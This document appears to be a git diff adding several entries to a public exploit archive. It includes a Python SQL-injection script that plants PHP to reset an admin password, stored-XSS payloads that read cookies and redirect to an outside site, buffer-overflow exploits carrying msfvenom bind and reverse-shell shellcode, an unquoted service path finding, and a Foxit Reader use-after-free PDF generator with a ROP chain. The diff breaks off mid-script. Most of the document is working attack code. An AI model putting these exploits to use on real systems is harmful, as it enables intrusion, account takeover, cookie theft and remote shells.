+F = [Fore.RESET,Fore.BLACK,Fore.RED,Fore.GREEN,Fore.YELLOW,Fore.BLUE,Fore.MAGENTA,Fore.CYAN,Fore.WHITE]
+S = [Style.RESET_ALL,Style.DIM,Style.NORMAL,Style.BRIGHT]
+ok   = S[3]+F[2]+')'+F[5]+'+++'+F[2]+'['+F[8]+'========> '+S[0]+F[0]
+err  = S[3]+F[2]+'<========'+F[2]+'('+F[5]+'+++'+F[2]+'( '+F[0]+S[0]
+
+
+def sig():
+    SIG  = F[2]+"    .-----.._       ,--.              "+F[5]+"  .__              .__________\n"
+    SIG += F[2]+"    |  ..    >  "+F[4]+"___"+F[2]+" |  | .--.         "+F[5]+"  |  |__ ___.__. __| _\\_____  \\  ______ ____  ____\n"
+    SIG += F[2]+"    |  |.'  ,'"+F[4]+"-'"+F[2]+"* *"+F[4]+"'-."+F[2]+" |/  /__   __   "+F[5]+"  |  |  <   |  |/ __ |  _(__  < /  ____/ __ _/ ___\\\n"
+    SIG += F[2]+"    |      <"+F[4]+"/ "+F[2]+"*  *  *"+F[4]+" \\   "+F[2]+"/   \\/   \\  "+F[5]+"  |   Y  \\___  / /_/ | /       \\\\___ \\\\  ___\\  \\___\n"
+    SIG += F[2]+"    |  |>   )   "+F[2]+"* *"+F[4]+"   /    "+F[2]+"\\        \\ "+F[5]+"  |___|  / ____\____ |/______  /____  >\\___  \\___  >\n"
+    SIG += F[2]+"    |____..- "+F[4]+"'-.._..-'"+F[2]+"_|\\___|._..\\___\\"+F[5]+"       \\/\\/         \\/       \\/     \\/     \\/    \\/\n"
+    SIG += F[2]+"        "+F[2]+"_______github.com/boku7_____  "+F[5]+"         _______github.com/hyd3sec____\n_"+F[0]+S[0]
+    return SIG
+
+
+
+def header():
+    head = S[3]+F[2]+'       ---  House Rental v1.0 | SQL Injection - Change Admin Password ---\n'+S[0]
+    return head
+
+def formatHelp(STRING):
+    return S[3]+F[2]+STRING+S[0]
+
+if __name__ == "__main__":
+    print(header())
+    print(sig())
+    if len(sys.argv) != 2:
+        print(err+formatHelp("Usage:\t python %s <WEBAPP_URL>" % sys.argv[0]))
+        print(err+formatHelp("Example:\t python %s 'http://172.16.65.130/home-rental/'" % sys.argv[0]))
+        sys.exit(-1)
+    SERVER_URL  = sys.argv[1]
+    if not re.match(r".*/$", SERVER_URL):
+        SERVER_URL = SERVER_URL+'/'
+    INDEX_URL   = SERVER_URL + 'index.php'
+    EXECUTE_URL = SERVER_URL + 'execute.php'
+    LOGIN_URL   = SERVER_URL + 'auth/login.php'
+    s = requests.Session()
+    get_session = s.get(INDEX_URL, verify=False) 
+    pdata       = {'keywords':'1337\') UNION SELECT all \'1,UPDATED,ADMIN,PASSWORD,TO,boku,aaaaaa,city,landmark,rent,deposit,plotnum,apartName,aptNum,rooms,floor,purpose,own,area,address,accomd,<?php require "config/config.php";$stmt=$connect->prepare("UPDATE users set password=\\\'17d8e2e8233d9a6ae428061cb2cdf226\\\' WHERE username=\\\'admin\\\'");$stmt->execute();?>,image,open,other,1,2020-08-01 14:42:11,2020-08-01 14:42:11,1\' into OUTFILE \'../../htdocs/home-rental/execute.php\' -- boku', 'location':'','search':'search'}
+    SQLi        = s.post(url=INDEX_URL, data=pdata, verify=False)
+    if SQLi.status_code == 200:
+        print(ok+"Sent "+F[2]+S[3]+"SQL Injection"+F[0]+S[0]+" POST Request to "+F[5]+S[3]+INDEX_URL+F[0]+S[0]+" with "+F[2]+S[2]+"payload"+F[0]+S[0]+":")
+        print(S[3]+F[2]+json.dumps(pdata, sort_keys=True, indent=4)+F[0]+S[0])
+    else:
+        print(err+'Cannot send payload to webserver.')
+        sys.exit(-1)
+    try:
+        print(ok+"Executing "+F[2]+S[3]+"SQL Injection"+F[0]+S[0]+" payload to change "+F[2]+S[2]+"admin password"+F[0]+S[0])
+        EXECUTE     = s.get(url=EXECUTE_URL, verify=False)
+    except:
+        print(err+'Failed to connect to '++F[2]+S[3]+EXECUTE_URL+F[0]+S[0]+'to execute payload')
+        sys.exit(-1)
+    print(ok+F[2]+S[3]+"SQL Injection payload executed!"+F[0]+S[0])
+    print(ok+F[2]+S[3]+"Login at "+F[5]+S[3]+LOGIN_URL+F[0]+S[0]+" with creds: "+F[2]+S[2]+"admin:boku"+F[0]+S[0])
\ No newline at end of file
diff --git a/exploits/php/webapps/49121.txt b/exploits/php/webapps/49121.txt
new file mode 100644
index 000000000..e70daf6c7
--- /dev/null
+++ b/exploits/php/webapps/49121.txt
@@ -0,0 +1,46 @@
+# Exploit Title: ElkarBackup 1.3.3 - 'Policy[name]' and 'Policy[Description]' Stored Cross-site Scripting
+# Date: 2020-08-22
+# Exploit Author: Vyshnav NK
+# Vendor Homepage: https://www.elkarbackup.org/
+# Software Link: https://github.com/elkarbackup/elkarbackup/wiki/Installation
+# Version: 1.3.3
+# Tested on: Linux
+
+Reproduction Steps: 
+
+1 - Go to the elakarbackup/login
+2 - Login with default credentials
+3 - Go to Policies >> Action >> Edit any of the existing Policies >> Insert XSS Payload in Paramter "Policy[name] and Policy[Description]"
+4 - Click on Save 
+5 - We can see the Javacript Code executed Sucessfully 
+
+
+XSS Attack vectors :
+
+"><svg/onload=alert(4)>
+"><svg/onload=alert(document.cookie)>
+
+
+
+Request : 
+
+POST /policy/1 HTTP/1.1
+Host: ip172-18-0-31-bt0bt4iosm4g00dvca80-8000.direct.labs.play-with-docker.com
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 1123
+Origin: http://ip172-18-0-31-bt0bt4iosm4g00dvca80-8000.direct.labs.play-with-docker.com
+Connection: close
+Referer: http://ip172-18-0-31-bt0bt4iosm4g00dvca80-8000.direct.labs.play-with-docker.com/policy/1?
+Cookie: PHPSESSID=03e0bcfa5864ffe758916b5e171c1505
+Upgrade-Insecure-Requests: 1
+
+Policy%5Bname%5D=%22%3E%3Csvg%2Fonload%3Dalert%284%29%3E&Policy%5Bdescription%5D=%22%3E%3Csvg%2Fonload%3Dalert%284%29%3E&Policy%5BhourlyHours%5D=12%3A00%7C15%3A00%7C21%3A00&Policy%5BhourlyDaysOfMonth%5D=&Policy%5BhourlyDaysOfWeek%5D=1%7C2%7C3%7C4%7C5&Policy%5BhourlyMonths%5D=&Policy%5BhourlyCount%5D=0&Policy%5BdailyHours%5D=21%3A00&Policy%5BdailyDaysOfMonth%5D=&Policy%5BdailyDaysOfWeek%5D=1%7C2%7C3%7C4%7C5&Policy%5BdailyMonths%5D=&Policy%5BdailyCount%5D=5&Policy%5BweeklyHours%5D=21%3A00&Policy%5BweeklyDaysOfMonth%5D=&Policy%5BweeklyDaysOfWeek%5D=1&Policy%5BweeklyMonths%5D=&Policy%5BweeklyCount%5D=4&Policy%5BmonthlyHours%5D=21%3A00&Policy%5BmonthlyDaysOfMonth%5D=1&Policy%5BmonthlyDaysOfWeek%5D=&Policy%5BmonthlyMonths%5D=&Policy%5BmonthlyCount%5D=12&Policy%5ByearlyHours%5D=21%3A00&Policy%5ByearlyDaysOfMonth%5D=&Policy%5ByearlyDaysOfWeek%5D=&Policy%5ByearlyMonths%5D=&Policy%5ByearlyCount%5D=0&Policy%5Bexclude%5D=%22%3E%3Csvg%2Fonload%3Dalert%284%29%3E&Policy%5Binclude%5D=%22%3E%3Csvg%2Fonload%3Dalert%284%29%3E&Policy%5BsyncFirst%5D=1&Policy%5B_token%5D=B6JELPCVSHiZrMvyEeeBdRMLYSKBWfUMUwBeLWw8XpI&weekly-day=on
+
+
+Response :
+
+<form data-bnv-message="Really delete policy "><svg/onload=alert(4)>?" class="delete-policy" action="/policy/1/delete" method="POST" style="display:inline">
\ No newline at end of file
diff --git a/exploits/php/webapps/49122.txt b/exploits/php/webapps/49122.txt
new file mode 100644
index 000000000..11898f31d
--- /dev/null
+++ b/exploits/php/webapps/49122.txt
@@ -0,0 +1,37 @@
+# Exploit Title: Best Support System 3.0.4 - 'ticket_body' Persistent XSS (Authenticated)
+# Google Dork: "Powered By Best Support System"
+# Date: 2020-08-23
+# Exploit Author: Ex.Mi [ https://ex-mi.ru ]
+# Vendor: Appsbd [ https://appsbd.com ]
+# Software Version: 3.0.4
+# Software Link: https://codecanyon.net/item/best-support-systemclient-support-desk-help-centre/21357317
+# Tested on: Kali Linux
+# CVE: CVE-2020-24963
+# CWE: CWE-79
+
+
+[i] :: Info:
+
+An Authenticated Persistent XSS vulnerability was discovered in the
+Best Support System, tested version — v3.0.4.
+
+
+[$] :: Payloads:
+
+13"-->">'` -- `<!--<img src="--><img src=x
+onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);location=`https://ex-mi.ru`;>
+
+
+[!] :: PoC (Burp Suite POST request):
+
+POST /support-system/ticket-confirm/ticket-reply/11.html HTTP/1.1
+Host: localhost
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 350
+Origin: https://localhost
+Connection: close
+Referer: https://localhost/support-system/ticket/details/11.html
+Cookie: [cookies_here]
+
+app_form=8d1c319d5826a789b3ca3e71516b0c5c&ticket_body=%3Cp%3E%3Cbr%3E%3C%2Fp%3E13%22--%26gt%3B%22%26gt%3B'%60+--+%60%3C!--%3Cimg+src%3D%22--%3E%3Cimg+src%3D%22x%22+onerror%3D%22(alert)(%60Ex_Mi%60)%3B(alert)(document.cookie)%3Blocation%3D%60https%3A%2F%2Fex-mi.ru%60%3B%22%3E&status=&app_form_ajax=ad1ce2b2c3eb943efaa8c239ff53acc2
\ No newline at end of file
diff --git a/exploits/windows/local/49089.py b/exploits/windows/local/49089.py
new file mode 100755
index 000000000..aa60f8902
--- /dev/null
+++ b/exploits/windows/local/49089.py
@@ -0,0 +1,55 @@
+# Exploit Title: Boxoft Audio Converter 2.3.0 - '.wav' Buffer Overflow (SEH)
+# Discovery by: Luis Martinez
+# Discovery Date: 2020-11-22
+# Vendor Homepage: http://www.boxoft.com/
+# Software Link: http://www.boxoft.com/audio-converter/a-pdf-bac.exe
+# Tested Version: 2.3.0
+# Vulnerability Type: Local Buffer Overflow (SEH)
+# Tested on OS: Windows 10 Pro (10.0.18362) x64 en
+ 
+# Steps to Produce the Local Buffer Overflow (SEH): 
+# 1.- Run python code: Boxotf_Audio_Converter_2.3.0.py
+# 2.- Open AudioConvert.exe
+# 3.- Try
+# 4.- Batch Convert Mode -> Next
+# 5.- Add
+# 6.- Select Boxotf_Audio_Converter_2.3.0.wav -> Open
+# 7.- Port 4444 open
+ 
+#!/usr/bin/env python
+#-*-coding: utf-8-*-
+
+#msfvenom -p windows/shell_bind_tcp -b '\x00\x0A\x0D' -f c
+
+shellcode = ("\xbb\x80\x84\x2c\xbc\xda\xce\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"
+"\x53\x31\x5e\x12\x83\xc6\x04\x03\xde\x8a\xce\x49\x22\x7a\x8c"
+"\xb2\xda\x7b\xf1\x3b\x3f\x4a\x31\x5f\x34\xfd\x81\x2b\x18\xf2"
+"\x6a\x79\x88\x81\x1f\x56\xbf\x22\x95\x80\x8e\xb3\x86\xf1\x91"
+"\x37\xd5\x25\x71\x09\x16\x38\x70\x4e\x4b\xb1\x20\x07\x07\x64"
+"\xd4\x2c\x5d\xb5\x5f\x7e\x73\xbd\xbc\x37\x72\xec\x13\x43\x2d"
+"\x2e\x92\x80\x45\x67\x8c\xc5\x60\x31\x27\x3d\x1e\xc0\xe1\x0f"
+"\xdf\x6f\xcc\xbf\x12\x71\x09\x07\xcd\x04\x63\x7b\x70\x1f\xb0"
+"\x01\xae\xaa\x22\xa1\x25\x0c\x8e\x53\xe9\xcb\x45\x5f\x46\x9f"
+"\x01\x7c\x59\x4c\x3a\x78\xd2\x73\xec\x08\xa0\x57\x28\x50\x72"
+"\xf9\x69\x3c\xd5\x06\x69\x9f\x8a\xa2\xe2\x32\xde\xde\xa9\x5a"
+"\x13\xd3\x51\x9b\x3b\x64\x22\xa9\xe4\xde\xac\x81\x6d\xf9\x2b"
+"\xe5\x47\xbd\xa3\x18\x68\xbe\xea\xde\x3c\xee\x84\xf7\x3c\x65"
+"\x54\xf7\xe8\x10\x5c\x5e\x43\x07\xa1\x20\x33\x87\x09\xc9\x59"
+"\x08\x76\xe9\x61\xc2\x1f\x82\x9f\xed\x0e\x0f\x29\x0b\x5a\xbf"
+"\x7f\x83\xf2\x7d\xa4\x1c\x65\x7d\x8e\x34\x01\x36\xd8\x83\x2e"
+"\xc7\xce\xa3\xb8\x4c\x1d\x70\xd9\x52\x08\xd0\x8e\xc5\xc6\xb1"
+"\xfd\x74\xd6\x9b\x95\x15\x45\x40\x65\x53\x76\xdf\x32\x34\x48"
+"\x16\xd6\xa8\xf3\x80\xc4\x30\x65\xea\x4c\xef\x56\xf5\x4d\x62"
+"\xe2\xd1\x5d\xba\xeb\x5d\x09\x12\xba\x0b\xe7\xd4\x14\xfa\x51"
+"\x8f\xcb\x54\x35\x56\x20\x67\x43\x57\x6d\x11\xab\xe6\xd8\x64"
+"\xd4\xc7\x8c\x60\xad\x35\x2d\x8e\x64\xfe\x5d\xc5\x24\x57\xf6"
+"\x80\xbd\xe5\x9b\x32\x68\x29\xa2\xb0\x98\xd2\x51\xa8\xe9\xd7"
+"\x1e\x6e\x02\xaa\x0f\x1b\x24\x19\x2f\x0e")
+
+nSEH = "\xeb\x06\x90\x90"
+SEH = "\xB8\x68\x40\x00" #AudioConvert.exe
+ 
+buffer = "\x41" * 4132 + nSEH + SEH + "\x90" * 16 + shellcode
+f = open ("Boxotf_Audio_Converter_2.3.0.wav", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/local/49100.py b/exploits/windows/local/49100.py
new file mode 100755
index 000000000..acf6c7333
--- /dev/null
+++ b/exploits/windows/local/49100.py
@@ -0,0 +1,99 @@
+# Exploit Title: docPrint Pro 8.0 - 'Add URL' Buffer Overflow (SEH Egghunter)
+# Date: 2020-07-26
+# Exploit Author: MasterVlad
+# Vendor Homepage: http://www.verypdf.com
+# Software Link: http://dl.verypdf.net/docprint_pro_setup.exe
+# Version: 8.0
+# Vulnerability Type: Local Buffer Overflow
+# Tested on: Windows 7 32-bit
+
+# Proof of Concept:
+
+# 1. Run the python script
+# 2. Open exploit.txt and copy the content to clipboard
+# 3. Open doc2pdf_win.exe and go to File -> Add URL
+# 4. Paste the clipboard into the field and click on Ok
+
+#!/usr/bin/python
+
+# encoded egghunter
+egg = "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x54\x58\x66\x05\x44\x17\x50\x5c\x25\x4A"
+egg += "\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x01\x7F\x01\x2D\x0B\x01\x7F\x01\x2D\x01\x16\x02\x15\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x7F\x01\x01\x2D\x50\x0B\x14\x4F\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x7F\x01\x01\x2D\x51\x29\x73\x04\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x01\x2C\x50\x2D\x10\x46\x7F\x7F\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x45\x7B\x26\x0C\x2D\x7F\x7F\x7F\x7F\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x28\x01\x52\x2D\x7F\x7F\x31\x7F\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x72\x4D\x3D\x16\x2D\x7F\x70\x70\x7F\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x1A\x7B\x01\x7F\x2D\x7F\x01\x33\x7F\x2D\x01\x02\x01\x02\x50"
+
+# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.164.129 LPORT=443 -b "\x00\x0a\x0d\x13\x14\x15\x16" -f py -e x86/alpha_mixed BufferRegister=EDI
+
+buf =  ""
+buf += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
+buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
+buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
+buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+buf += "\x69\x6c\x68\x68\x6e\x62\x55\x50\x45\x50\x43\x30\x63"
+buf += "\x50\x6e\x69\x6a\x45\x45\x61\x59\x50\x55\x34\x4e\x6b"
+buf += "\x52\x70\x76\x50\x6c\x4b\x73\x62\x76\x6c\x6c\x4b\x70"
+buf += "\x52\x42\x34\x6e\x6b\x43\x42\x75\x78\x64\x4f\x48\x37"
+buf += "\x42\x6a\x71\x36\x65\x61\x39\x6f\x6e\x4c\x67\x4c\x53"
+buf += "\x51\x71\x6c\x76\x62\x56\x4c\x67\x50\x79\x51\x78\x4f"
+buf += "\x36\x6d\x43\x31\x79\x57\x6d\x32\x4c\x32\x72\x72\x66"
+buf += "\x37\x6e\x6b\x72\x72\x56\x70\x6e\x6b\x32\x6a\x75\x6c"
+buf += "\x4e\x6b\x62\x6c\x37\x61\x33\x48\x69\x73\x43\x78\x56"
+buf += "\x61\x38\x51\x50\x51\x4e\x6b\x71\x49\x31\x30\x57\x71"
+buf += "\x4b\x63\x6e\x6b\x71\x59\x37\x68\x68\x63\x57\x4a\x50"
+buf += "\x49\x6e\x6b\x75\x64\x4e\x6b\x43\x31\x68\x56\x35\x61"
+buf += "\x59\x6f\x6e\x4c\x69\x51\x48\x4f\x36\x6d\x55\x51\x6f"
+buf += "\x37\x65\x68\x4b\x50\x70\x75\x69\x66\x73\x33\x51\x6d"
+buf += "\x6a\x58\x35\x6b\x63\x4d\x76\x44\x54\x35\x4d\x34\x43"
+buf += "\x68\x4e\x6b\x70\x58\x37\x54\x76\x61\x59\x43\x62\x46"
+buf += "\x6c\x4b\x54\x4c\x72\x6b\x6e\x6b\x51\x48\x35\x4c\x35"
+buf += "\x51\x79\x43\x6c\x4b\x43\x34\x6c\x4b\x63\x31\x68\x50"
+buf += "\x6d\x59\x57\x34\x76\x44\x67\x54\x31\x4b\x51\x4b\x33"
+buf += "\x51\x71\x49\x72\x7a\x50\x51\x79\x6f\x69\x70\x43\x6f"
+buf += "\x63\x6f\x33\x6a\x6e\x6b\x65\x42\x48\x6b\x6c\x4d\x31"
+buf += "\x4d\x50\x68\x45\x63\x55\x62\x73\x30\x75\x50\x30\x68"
+buf += "\x44\x37\x73\x43\x45\x62\x43\x6f\x43\x64\x45\x38\x42"
+buf += "\x6c\x53\x47\x46\x46\x63\x37\x69\x6f\x69\x45\x48\x38"
+buf += "\x4a\x30\x45\x51\x57\x70\x55\x50\x67\x59\x49\x54\x70"
+buf += "\x54\x32\x70\x42\x48\x44\x69\x6d\x50\x70\x6b\x67\x70"
+buf += "\x79\x6f\x6b\x65\x66\x30\x30\x50\x70\x50\x32\x70\x43"
+buf += "\x70\x72\x70\x67\x30\x62\x70\x75\x38\x58\x6a\x36\x6f"
+buf += "\x49\x4f\x79\x70\x69\x6f\x48\x55\x4c\x57\x53\x5a\x56"
+buf += "\x65\x52\x48\x79\x50\x79\x38\x4f\x54\x6d\x51\x52\x48"
+buf += "\x43\x32\x53\x30\x63\x31\x4d\x6b\x6d\x59\x38\x66\x30"
+buf += "\x6a\x66\x70\x43\x66\x53\x67\x61\x78\x5a\x39\x6e\x45"
+buf += "\x72\x54\x33\x51\x59\x6f\x58\x55\x4b\x35\x59\x50\x44"
+buf += "\x34\x66\x6c\x69\x6f\x32\x6e\x65\x58\x31\x65\x4a\x4c"
+buf += "\x50\x68\x6a\x50\x68\x35\x39\x32\x73\x66\x49\x6f\x58"
+buf += "\x55\x62\x48\x42\x43\x32\x4d\x73\x54\x57\x70\x6b\x39"
+buf += "\x39\x73\x66\x37\x76\x37\x42\x77\x55\x61\x49\x66\x50"
+buf += "\x6a\x54\x52\x73\x69\x70\x56\x78\x62\x49\x6d\x32\x46"
+buf += "\x49\x57\x57\x34\x51\x34\x65\x6c\x53\x31\x65\x51\x4c"
+buf += "\x4d\x52\x64\x61\x34\x32\x30\x6b\x76\x47\x70\x72\x64"
+buf += "\x51\x44\x42\x70\x42\x76\x46\x36\x43\x66\x77\x36\x42"
+buf += "\x76\x62\x6e\x32\x76\x71\x46\x70\x53\x46\x36\x33\x58"
+buf += "\x61\x69\x58\x4c\x35\x6f\x6b\x36\x6b\x4f\x4b\x65\x4d"
+buf += "\x59\x49\x70\x30\x4e\x31\x46\x33\x76\x6b\x4f\x66\x50"
+buf += "\x71\x78\x43\x38\x4b\x37\x37\x6d\x73\x50\x6b\x4f\x4b"
+buf += "\x65\x6f\x4b\x48\x70\x6c\x75\x4f\x52\x72\x76\x73\x58"
+buf += "\x49\x36\x6e\x75\x4d\x6d\x4d\x4d\x59\x6f\x39\x45\x55"
+buf += "\x6c\x63\x36\x53\x4c\x66\x6a\x4d\x50\x79\x6b\x6b\x50"
+buf += "\x64\x35\x46\x65\x6f\x4b\x72\x67\x45\x43\x50\x72\x70"
+buf += "\x6f\x32\x4a\x65\x50\x51\x43\x49\x6f\x59\x45\x41\x41"
+
+exploit = "A"*3876
+exploit += "\x74\x06\x75\x04"
+# 0x1001062d - pop pop ret - reg.dll
+exploit += "\x2d\x06\x01\x10"
+exploit += egg
+exploit += "D"*(10000-3884-len(egg)-len(buf)-8)
+exploit += "T00WT00W"
+exploit += buf
+
+f = open("exploit.txt", "w")
+f.write(exploit)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/local/49101.txt b/exploits/windows/local/49101.txt
new file mode 100644
index 000000000..bafbade3e
--- /dev/null
+++ b/exploits/windows/local/49101.txt
@@ -0,0 +1,27 @@
+# Exploit Title: Wondershare Driver Install Service help 10.7.1.321 - 'ElevationService' Unquote Service Path
+# Date: 2020-11-24
+# Exploit Author: Luis Sandoval
+# Vendor Homepage: https://www.wondershare.com/
+# Software Link: https://www.wondershare.com/drfone/
+# Version: 10.7.1.321
+# Tested on: Windows 10 Home Single Language x64 Esp
+
+# Service info:
+
+C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
+
+Wondershare Driver Install Service help    ElevationService   C:\Program Files (x86)\Wondershare\Dr.Fone\Addins\Recovery\ElevationService.exe     Auto
+
+C:\Users\user>sc qc ElevationService
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: ElevationService
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 1   NORMAL
+        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Wondershare\Dr.Fone\Addins\Recovery\ElevationService.exe
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : Wondershare Driver Install Service help
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/49116.py b/exploits/windows/local/49116.py
new file mode 100755
index 000000000..77ce33d1d
--- /dev/null
+++ b/exploits/windows/local/49116.py
@@ -0,0 +1,273 @@
+# Exploit Title: Foxit Reader 9.0.1.1049 - Arbitrary Code Execution
+# Date: August 29, 2020
+# Exploit Author: CrossWire
+# Vendor Homepage: https://www.foxitsoftware.com/
+# Software Link: https://www.foxitsoftware.com/downloads/latest.php?product=Foxit-Reader&platform=Windows&version=9.0.1.1049&package_type=exe&language=English
+# Version: 9.0.1.1049
+# Tested on: Microsoft Windows Server 2016 10.0.14393
+# CVE : [2018-9958](https://nvd.nist.gov/vuln/detail/CVE-2018-9958)
+
+#!/usr/bin/python3
+
+'''
+===========================================================================
+|   PDF generator for Foxit Reader Remote Code Execution (CVE 2018-9958)  |  
+===========================================================================
+| Written by: Kevin Dorland (CrossWire)                                   |
+| Date: 08/29/2020                                                        |
+|                                                                         |
+| Exploit originally discovered by Steven Seeley (mr_me) of Source Incite |
+|                                                                         |
+| References:                                                             |
+|   https://www.exploit-db.com/exploits/44941 (Steven Seely Calc.exe PoC) |
+|   https://www.exploit-db.com/exploits/45269 (Metasploit adaptation)     |
+|                                                                         |
+===========================================================================
+'''
+
+
+PDF_TEMPLATE = '''
+%PDF
+1 0 obj
+<</Pages 1 0 R /OpenAction 2 0 R>>
+2 0 obj
+<</S /JavaScript /JS (
+
+var heap_ptr   = 0;
+var foxit_base = 0;
+var pwn_array  = [];
+
+function prepare_heap(size){
+    var arr = new Array(size);
+    for(var i = 0; i < size; i++){
+        arr[i] = this.addAnnot({type: "Text"});;
+        if (typeof arr[i] == "object"){
+            arr[i].destroy();
+        }
+    }
+}
+
+function gc() {
+    const maxMallocBytes = 128 * 0x100000;
+    for (var i = 0; i < 3; i++) {
+        var x = new ArrayBuffer(maxMallocBytes);
+    }
+}
+
+function alloc_at_leak(){
+    for (var i = 0; i < 0x64; i++){
+        pwn_array[i] = new Int32Array(new ArrayBuffer(0x40));
+    }
+}
+
+function control_memory(){
+    for (var i = 0; i < 0x64; i++){
+        for (var j = 0; j < pwn_array[i].length; j++){
+            pwn_array[i][j] = foxit_base + 0x01a7ee23; // push ecx; pop esp; pop ebp; ret 4
+        }
+    }
+}
+
+function leak_vtable(){
+    var a = this.addAnnot({type: "Text"});
+
+    a.destroy();
+    gc();
+
+    prepare_heap(0x400);
+    var test = new ArrayBuffer(0x60);
+    var stolen = new Int32Array(test);
+
+    var leaked = stolen[0] & 0xffff0000;
+    foxit_base = leaked - 0x01f50000;
+}
+
+function leak_heap_chunk(){
+    var a = this.addAnnot({type: "Text"});
+    a.destroy();
+    prepare_heap(0x400);
+
+    var test = new ArrayBuffer(0x60);
+    var stolen = new Int32Array(test);
+
+    alloc_at_leak();
+    heap_ptr = stolen[1];
+}
+
+function reclaim(){
+    var arr = new Array(0x10);
+    for (var i = 0; i < arr.length; i++) {
+        arr[i] = new ArrayBuffer(0x60);
+        var rop = new Int32Array(arr[i]);
+
+        rop[0x00] = heap_ptr;                // pointer to our stack pivot from the TypedArray leak
+        rop[0x01] = foxit_base + 0x01a11d09; // xor ebx,ebx; or [eax],eax; ret
+        rop[0x02] = 0x72727272;              // junk
+        rop[0x03] = foxit_base + 0x00001450  // pop ebp; ret
+        rop[0x04] = 0xffffffff;              // ret of WinExec
+        rop[0x05] = foxit_base + 0x0069a802; // pop eax; ret
+        rop[0x06] = foxit_base + 0x01f2257c; // IAT WinExec
+        rop[0x07] = foxit_base + 0x0000c6c0; // mov eax,[eax]; ret
+        rop[0x08] = foxit_base + 0x00049d4e; // xchg esi,eax; ret
+        rop[0x09] = foxit_base + 0x00025cd6; // pop edi; ret
+        rop[0x0a] = foxit_base + 0x0041c6ca; // ret
+        rop[0x0b] = foxit_base + 0x000254fc; // pushad; ret
+        
+        //Path to executable
+
+<PATH TO EXECUTABLE>
+        
+        //End Path to executable
+
+        rop[0x17] = 0x00000000;              // adios, amigo
+    }
+}
+
+function trigger_uaf(){
+    var that = this;
+    var a = this.addAnnot({type:"Text", page: 0, name:"uaf"});
+    var arr = [1];
+    Object.defineProperties(arr,{
+        "0":{
+            get: function () {
+
+                that.getAnnot(0, "uaf").destroy();
+
+                reclaim();
+                return 1;
+            }
+        }
+    });
+
+    a.point = arr;
+}
+
+function main(){
+    leak_heap_chunk();
+    leak_vtable();
+    control_memory();
+    trigger_uaf();
+}
+
+if (app.platform == "WIN"){
+    if (app.isFoxit == "Foxit Reader"){
+        if (app.appFoxitVersion == "9.0.1.1049"){
+            main();
+        }
+    }
+}
+
+)>> trailer <</Root 1 0 R>>
+'''
+
+import sys
+
+#Enforces 2 hex char byte notation. "0" becomes "0x00"
+def format_byte(b):
+
+    if (len(b) > 2) and (b[0:2] == '0x'):
+        b = b[2:]
+
+    if len(b) == 1:
+        b = '0' + b
+
+    return '0x' + b
+
+def char2hex(c):
+    return format_byte(hex(ord(c)))
+
+#Converts file path into array of eleven 32-bit hex words
+def path_to_machine_code(path,little_endian = True):
+
+    print("[+] Encoding Path:",path)
+
+    #ensure length
+    if len(path) > 44:
+        print("[CRITICAL] Path length greater than 44 characters (bytes). Aborting!")
+        exit(-1)
+
+    #Copy path into 4 character (32 bit) words (max 11)
+    word_array = []
+    for i in range(11):
+        
+        word = ''
+
+        if len(path):
+            word += path[0:4] if len(path) >= 4 else path
+            path = path[len(word):]
+        
+        if len(word) < 4:
+            word += chr(0) * (4 - len(word))
+
+        word_array.append(word)
+
+    #Convert chars to hex values and format to "0xAABBCCDD" notation
+    hex_array = []
+    for word in word_array:
+            
+        #Reverse byte order to fit little endian standard
+        if(little_endian): word = word[::-1]
+
+        #Write bytes to hex strings
+        hex_string = '0x'
+        for char in word:
+            hex_string += char2hex(char)[2:] #strip the 0x off the byte here
+
+        hex_array.append(hex_string)
+   
+    return hex_array
+
+#writes encoded path to rop array to match template
+def create_rop(hex_arr, start_index = '0c'):
+
+    ord_array = []
+
+    index = int(start_index,16)
+
+    for instruction in hex_arr:
+
+        full_instruction = f"\trop[{format_byte(hex(index))}] = {instruction};"
+
+        ord_array.append(full_instruction)
+    
+        index += 1
+
+    return ('\n'.join(ord_array))
+    
+    
+
+if __name__ == '__main__':
+    
+    if len(sys.argv) != 3:
+        print(f"USAGE: {sys.argv[0]} <path to executable> <pdf filename>")
